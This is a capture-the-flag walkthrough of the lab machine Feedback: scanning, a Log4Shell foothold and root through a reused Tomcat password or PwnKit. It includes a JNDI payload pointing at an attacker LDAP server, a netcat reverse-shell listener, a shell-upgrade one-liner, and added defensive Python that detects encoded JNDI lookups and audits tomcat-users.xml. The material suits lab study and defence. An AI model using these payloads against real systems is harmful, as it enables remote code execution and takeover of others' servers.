Walkthrough – Feedback (Vulnlab and Hack The Box HTB)

This is a walkthrough of the machine Feedback on Vulnlab: https://www.vulnlab.com/

As of June 2025, Hack The Box HTB has migrated Vulnlab machines onto their lab offerings.

Enumeration

rustscan

└─$ rustscan -a 10.10.66.198 --ulimit 5000 --range 1-65535 -- -sVC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.66.198:22
Open 10.10.66.198:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 02:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 02:51
Completed Parallel DNS resolution of 1 host. at 02:51, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 02:51
Scanning 10.10.66.198 [2 ports]
Discovered open port 8080/tcp on 10.10.66.198
Discovered open port 22/tcp on 10.10.66.198
Completed Connect Scan at 02:51, 0.32s elapsed (2 total ports)
Initiating Service scan at 02:51
Scanning 2 services on 10.10.66.198
Completed Service scan at 02:51, 6.58s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.66.198.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:52, 6.05s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 1.12s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
Nmap scan report for 10.10.66.198
Host is up, received user-set (0.32s latency).
Scanned at 2024-05-04 02:51:49 EDT for 14s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:09:30:b6:ed:09:76:82:5c:8b:35:6e:3c:b4:f9:c8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7yy/2WRi9K75HnuxM328nonccsOP4itgr8PY9U1Y4HMeF28ngzwWSyK1wYjVvxUpdlwW4rIBXCtdMf1/7Jn5f6hXCyOJLeQQLLkoBTcHYxACW6F55mSekEz49obAFFH/ACAeezDQ/37fBZOFwxOwSXk5B5b1g4f9GpmaNX776KthlBVLLx1CUn531CiMWXzmIY9TSmQvlWi/pdwOa+4FEABuyCQVO41qCfCyRUX+h60pklEOhXqsIh0+yGRG0uyGwnwnHG7dKOgitcw2Z8YYUtXL6HJOHJKmsfbr6rjxXlp4Ct5lrYFNlXOKxB05YjTEJLAGM+1P4j/vogaNiAFGp
|   256 ca:2a:24:49:5c:02:51:ce:57:b8:44:3e:26:17:c2:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDoGN1gQm+PyY0FPm+sspVK2bAjxfcqAVL0dAThzQ11VAVNoNVDhKbe0/DK5y0IvKH2eIXugAjszCo6YAAaHo74=
|   256 b1:e5:be:17:07:b2:ff:2b:db:78:0d:cd:3e:bc:be:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHZlNCKrir0IjUR3q7Il9D2DeYeZM3GpeDRK9sqHDdBr
8080/tcp open  http    syn-ack Apache Tomcat 9.0.56
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.56
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

web server on 8080

I see a Tomcat server on port 8080:

Next I run gobuster to look for hidden directories or files:

gobuster dir -k -u http://10.10.66.198:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php,html -t 40

I discover a page on /feedback

It looks like I can enter strings into the feedback form:

I look at the source code and it indicates this was built with log4j, which is a clue to a potential foothold:

Initial Foothold – log4j RCE

I run searchsploit and find some scripts to run against the target:

I download the script, but it looks off and will probably cause syntax issues.

I go directly to the github repo mentioned in the script at: https://github.com/kozmer/log4j-shell-poc

I download it with git clone https://github.com/kozmer/log4j-shell-poc

Make sure to follow the instructions on the GitHub repo and install the dependencies with pip install -r requirements.txt

Reading the script, it needs the JDK build it references to be present in the PoC folder in order to run without errors.

This JDK version has to be downloaded from the Oracle site, which requires a sign-in. The file is over 100 MB.

Make sure it’s in the PoC folder:

Now we can run the script, which starts the LDAP server.

We need to catch the shell by running nc -lvnp 9001

We need to enter ${jndi:ldap://10.8.2.31:1389/a} into the feedback form, as indicated by the poc.py script we ran.

It won't work as-is, because the payload needs to be URL-encoded.

Go to Repeater in Burp:

We need to URL-encode all the characters:

You’ll get a 200 response when you send the payload.

When we check our netcat listener we can see that we got a connection.

Make sure to run python3 -c "import pty;pty.spawn('/bin/bash')" to upgrade the shell.
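As a defensive counterpart to the payload step above, here is an added example (it is not part of the original post or of the log4j-shell-poc project): a small Python detector that URL-decodes request fields the way the form submission above was encoded and flags JNDI lookups, so a WAF rule or log pipeline can catch the pattern before it reaches a vulnerable Log4j. The request samples, the attacker host name and the field names are constructed for this example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# A Log4j 2 lookup that reaches out to a remote naming service, e.g. ${jndi:ldap://host:1389/a}.
# The scheme and host are captured so an alert can name where the lookup points.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:\s*//\s*(?P<host>[^/}\s]+)",
    re.IGNORECASE,
)


def normalize(value: str, rounds: int = 3) -> str:
    """Repeatedly URL-decode a field value.

    Log4j never sees the encoded form: the servlet container decodes request
    parameters before the application logs them, which is why the walkthrough
    had to URL-encode the payload. A detector that inspects raw traffic has to
    undo that encoding (and a second layer of it) before matching.
    """
    out = value
    for _ in range(rounds):
        decoded = unquote(out)
        if decoded == out:
            break
        out = decoded
    return out


def scan_request(req: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per JNDI lookup found in any field of a captured request."""
    findings = []
    for field, value in req.items():
        for m in JNDI_LOOKUP.finditer(normalize(value)):
            findings.append({
                "path": req.get("path", ""),
                "field": field,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
            })
    return findings


def scan_all(requests: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [f for r in requests for f in scan_request(r)]


# Constructed samples: a benign submission, the encoded payload from the walkthrough as Burp
# would send it, and a double-encoded lookup hidden in a header (host name is made up).
SAMPLE_REQUESTS = [
    {"path": "/feedback", "body": "feedback=Great+site%2C+thanks%21", "user-agent": "Mozilla/5.0"},
    {"path": "/feedback", "body": "feedback=%24%7Bjndi%3Aldap%3A%2F%2F10.8.2.31%3A1389%2Fa%7D", "user-agent": "Mozilla/5.0"},
    {"path": "/", "body": "", "user-agent": "%2524%257Bjndi%253Armi%253A%252F%252Fattacker.example%253A1099%252Fx%257D"},
]

if __name__ == "__main__":
    for finding in scan_all(SAMPLE_REQUESTS):
        print(f"JNDI lookup in {finding['field']} of {finding['path']}: "
              f"{finding['scheme']}://{finding['host']}")
```

The decode loop is the part that matters: matching the literal string `${jndi:` against raw request bytes misses exactly the encoded form the walkthrough used. Log4j also supports nested lookups that can split the `jndi` keyword itself, so a production rule should normalize those too; the real fix is patching Log4j (2.17.0 or later) or removing the JndiLookup class, with the detector as a second layer.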

Privesc – tomcat password

linpeas

We run linpeas to check for privesc paths:

We immediately find credentials in the tomcat-users.xml file in the linpeas output.

I simply run su root with that password and get a root shell:
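The root of this privesc is a readable tomcat-users.xml holding a plaintext password that was reused for root. As an added example (not from the original post), here is a Python audit script that checks the three things a defender would want to catch on such a host: whether the file is readable by anyone besides its owner, whether any stored password is plaintext rather than in Tomcat's digest format, and which users hold privileged manager roles. The sample tomcat-users.xml, its user names and passwords are constructed for the example; the plaintext-versus-hashed check is a heuristic that assumes the default salt$iterations$hash format written by Tomcat's digest tool.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET
from typing import List

# Roles that control the Tomcat server itself. A leaked password for one of these is far
# worse than one for an application-only role.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}


def looks_hashed(password: str) -> bool:
    """Heuristic (assumption: default MessageDigestCredentialHandler format).

    Tomcat's digest tool stores credentials as salt$iterations$hash, so a value
    without at least two '$' separators is treated as plaintext.
    """
    return password.count("$") >= 2


def audit_tomcat_users(path: str) -> List[str]:
    """Return a list of human-readable findings for a tomcat-users.xml file."""
    findings = []

    # 1. File permissions: any local user (or a compromised Tomcat process running as a
    #    low-privileged account) can read a group/world-readable file.
    mode = os.stat(path).st_mode
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(
            f"{path} is readable by group/others (mode {oct(stat.S_IMODE(mode))})"
        )

    # 2. and 3. Per-user checks. The file normally uses the http://tomcat.apache.org/xml
    #    namespace, so compare on the local tag name only; Tomcat accepts both the
    #    'username' and the older 'name' attribute.
    root = ET.parse(path).getroot()
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":
            continue
        name = el.get("username") or el.get("name")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if not looks_hashed(password):
            findings.append(f"user {name!r}: password stored in plaintext")
        privileged = roles & PRIVILEGED_ROLES
        if privileged:
            findings.append(f"user {name!r}: holds privileged role(s) {sorted(privileged)}")
    return findings


# Constructed sample file: one admin with a plaintext password and manager roles, one
# application user whose password is stored in digest form.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="feedback-app"/>
  <user username="admin" password="Sup3rS3cretPassw0rd" roles="manager-gui,manager-script"/>
  <user username="app" password="6b9f0a1c$10000$5f4dcc3b5aa765d61d8327deb882cf99" roles="feedback-app"/>
</tomcat-users>
"""


def write_sample(mode: int = 0o644) -> str:
    """Write the constructed sample to a temp file with the given permission bits."""
    fd, path = tempfile.mkstemp(suffix="tomcat-users.xml")
    with os.fdopen(fd, "w") as f:
        f.write(SAMPLE_TOMCAT_USERS)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for line in audit_tomcat_users(write_sample()):
        print("FINDING:", line)
```

Run it against /etc/tomcat9/tomcat-users.xml (or wherever the install keeps it) rather than the sample. Tightening the mode to 0600 owned by the tomcat user, hashing the stored passwords, and above all not sharing a service password with a local account would have closed this particular path.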

Privesc – PwnKit

The linpeas output also shows that the machine is vulnerable to PwnKit:

I download and run PwnKit and get root immediately.

Conclusion

This was a fairly straightforward machine. It took a while to figure out how to configure the script to run properly to get the initial foothold. Privesc was straightforward as well.

– Z333RO
